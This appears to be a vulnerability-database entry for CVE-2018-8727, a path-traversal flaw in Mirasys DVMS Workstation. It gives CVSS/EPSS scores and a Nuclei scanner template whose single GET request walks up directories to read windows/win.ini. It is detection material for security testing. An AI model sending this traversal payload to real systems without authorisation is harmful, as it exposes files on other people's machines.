Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-8727
HistoryDec 06, 2021 - 12:48 p.m.

Mirasys DVMS Workstation <=5.12.6 - Local File Inclusion

2021-12-0612:48:35
ProjectDiscovery
github.com
1

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.6 High

AI Score

Confidence

High

0.011 Low

EPSS

Percentile

84.5%

Mirasys DVMS Workstation versions 5.12.6 and prior suffer from local file inclusion vulnerabilities.
id: CVE-2018-8727

info:
  name: Mirasys DVMS Workstation <=5.12.6 - Local File Inclusion
  author: 0x_akoko
  severity: high
  description: |
    Mirasys DVMS Workstation versions 5.12.6 and prior suffer from local file inclusion vulnerabilities.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system.
  remediation: |
    Upgrade to a patched version of Mirasys DVMS Workstation (>=5.12.7) to mitigate the LFI vulnerability.
  reference:
    - https://packetstormsecurity.com/files/148266/Mirasys-DVMS-Workstation-5.12.6-Path-Traversal.html
    - https://www.onvio.nl/nieuws/cve-mirasys-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2018-8727
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-8727
    cwe-id: CWE-22
    epss-score: 0.01105
    epss-percentile: 0.84452
    cpe: cpe:2.3:a:mirasys:dvms_workstation:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: mirasys
    product: dvms_workstation
  tags: cve,cve2018,mirasys,lfi,packetstorm

http:
  - method: GET
    path:
      - "{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini"

    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# digest: 4b0a00483046022100807e5b7e34e391d45acee418479b6eca1df5ed7c630992a7d46ac020d1aed8b6022100fbe67ce37ff80615abd2f2365690b7eb4c451711a48b9305509218ec620cfb9a:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.6 High

AI Score

Confidence

High

0.011 Low

EPSS

Percentile

84.5%